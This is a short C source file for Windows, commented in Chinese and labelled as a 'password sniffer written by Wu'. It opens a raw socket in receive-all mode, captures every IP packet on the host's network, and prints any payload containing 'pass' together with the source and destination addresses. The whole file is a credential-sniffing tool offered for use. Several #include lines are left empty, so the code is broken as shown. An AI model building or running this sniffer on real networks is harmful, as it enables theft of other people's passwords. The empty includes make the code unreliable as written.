#include
#include
#include
#include
#include "ws2tcpip.h"
#define MAX_PACK_LEN 4096 //接收的最大IP报文
#define MAX_ADDR_LEN 16 // 点分十进制地址的最大长度
#define MAX_HOSTNAME_LAN 255 //最大主机名长度
typedef struct _iphdr
{
unsigned char h_lenver; //4位首部长度+4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IP_HEADER;
SOCKET SockRaw;
int DecodeIpPack(char *,int); //IP解包函数
void CheckSockError(int,char*);//SOCK错误处理函数
void main(int argc, char ** argv)
{
int iErrorCode;
char RecvBuf[MAX_PACK_LEN] = {0};
WSADATA wsaData;
char name[MAX_HOSTNAME_LAN];
struct hostent * pHostent;
SOCKADDR_IN sa;
DWORD dwBufferLen [10];
DWORD dwBufferInLen = 1;
DWORD dwBytesReturned = 0;
if(argc!=1)
{
printf("Password sniffer written by Wu.\n\n");
printf("Usage:");
printf("\tsniffer.exe \n");
exit(0);
}
printf("It's now sniffing,CTRL+C to exit...\n\n");
//初始化SOCKET,建立一个原始套接字
iErrorCode = WSAStartup(0x0202,&wsaData);
CheckSockError(iErrorCode, "WSAStartup");
SockRaw = socket(AF_INET , SOCK_RAW , IPPROTO_IP);
CheckSockError(SockRaw, "socket");
//获取本机IP地址
iErrorCode = gethostname(name, MAX_HOSTNAME_LAN);
CheckSockError(iErrorCode, "gethostname");
pHostent = (struct hostent * )malloc(sizeof(struct hostent));
pHostent = gethostbyname(name);
sa.sin_family = AF_INET;
sa.sin_port = htons(6000);
memcpy(&sa.sin_addr.S_un.S_addr, pHostent->h_addr_list[0], pHostent->h_length);
//绑定套接字
iErrorCode = bind(SockRaw, (PSOCKADDR)&sa, sizeof(sa));
CheckSockError(iErrorCode, "bind");
//设置SOCK_RAW为SIO_RCVALL,以便接收所有的IP包
iErrorCode=WSAIoctl(SockRaw, SIO_RCVALL,&dwBufferInLen, sizeof(dwBufferInLen),
&dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL );
CheckSockError(iErrorCode, "Ioctl");
//侦听IP报文
while(1)
{
memset(RecvBuf, 0, sizeof(RecvBuf));
iErrorCode = recv(SockRaw, RecvBuf, sizeof(RecvBuf), 0);
CheckSockError(iErrorCode, "recv");
iErrorCode = DecodeIpPack(RecvBuf, iErrorCode);//对收到的IP包进行解包
CheckSockError(iErrorCode, "Decode");
}
}
//IP解包程序
int DecodeIpPack(char *buf, int iBufSize)
{
IP_HEADER *pIpheader;
char *SearchPass;
int iIphLen, iTTL;
char szSourceIP[MAX_ADDR_LEN], szDestIP[MAX_ADDR_LEN];
SOCKADDR_IN saSource, saDest;
pIpheader = (IP_HEADER *)buf;
//获取源IP地址
saSource.sin_addr.s_addr = pIpheader->sourceIP;
strncpy(szSourceIP, inet_ntoa(saSource.sin_addr), MAX_ADDR_LEN);
//获取目标IP地址
saDest.sin_addr.s_addr = pIpheader->destIP;
strncpy(szDestIP, inet_ntoa(saDest.sin_addr), MAX_ADDR_LEN);
iTTL = pIpheader->ttl;
//计算IP包头长度
iIphLen = sizeof(unsigned long) * (pIpheader->h_lenver & 0xf);
SearchPass = buf + iIphLen + 20 ;
//如果抓到密码就输出
if(strstr(SearchPass,"pass")||strstr(SearchPass,"Pass")||strstr(SearchPass,"PASS"))
{
printf("\n\n%s->%s ", szSourceIP, szDestIP); //输出源计算机和目的计算机的IP地址
printf("bytes=%d TTL=%d \n",iBufSize,iTTL);
printf("%s",SearchPass);
}
return 0;
}
//SOCK错误处理程序
void CheckSockError(int iErrorCode, char *pErrorMsg)
{
if(iErrorCode==SOCKET_ERROR)
{
printf("%s Error:%d\n", pErrorMsg, GetLastError());
closesocket(SockRaw);
exit(0);
}
}
